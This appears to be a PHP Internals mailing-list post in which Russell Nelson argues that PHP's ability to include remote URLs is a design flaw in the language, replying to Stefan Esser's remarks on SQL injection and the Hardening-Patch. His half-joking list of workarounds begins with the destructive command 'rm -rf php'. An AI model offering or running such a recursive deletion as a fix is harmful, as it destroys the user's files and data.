Stefan Esser writes: > I agree with Rasmus. Remote URL Includes are dieing out.
That's not what Rasmus said. > Most released advisories are SQL Injections nowadays and well maybe > Russells next mail says: mysql_query() considered harmful. When the top Google result for 'php security flaw' returns mysql_query() instead of include(), I will agree that you are correct. > Ohhh btw Russell, if you really consider include harmful, then simply > install the Hardening-Patch for PHP and live with it. I'm not trying to fix this for me. Clearly there are at least a half-dozen things I could do to fix the problem for myself[!]. I believe that the problem's cause is the design of the language intrinsic. Therefore, fixing the problem for myself doesn't address the cause of the problem. It just prevents me from seeing the problem anymore. The problem is still there. [!] The first six: 1) rm -rf php 2) don't allow my users access to php. 3) audit all code written by my users. 4) turn allow_url_fopen off. 5) install Hardening. 6) write my own patch removing url_fopen capability from 'include'. -- --My blog is at blog.russnelson.com | If you want to find Crynwr sells support for free software | PGPok | injustice in economic 521 Pleasant Valley Rd. | +1 315-323-1241 | affairs, look for the Potsdam, NY 13676-3213 | | hand of a legislator. -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
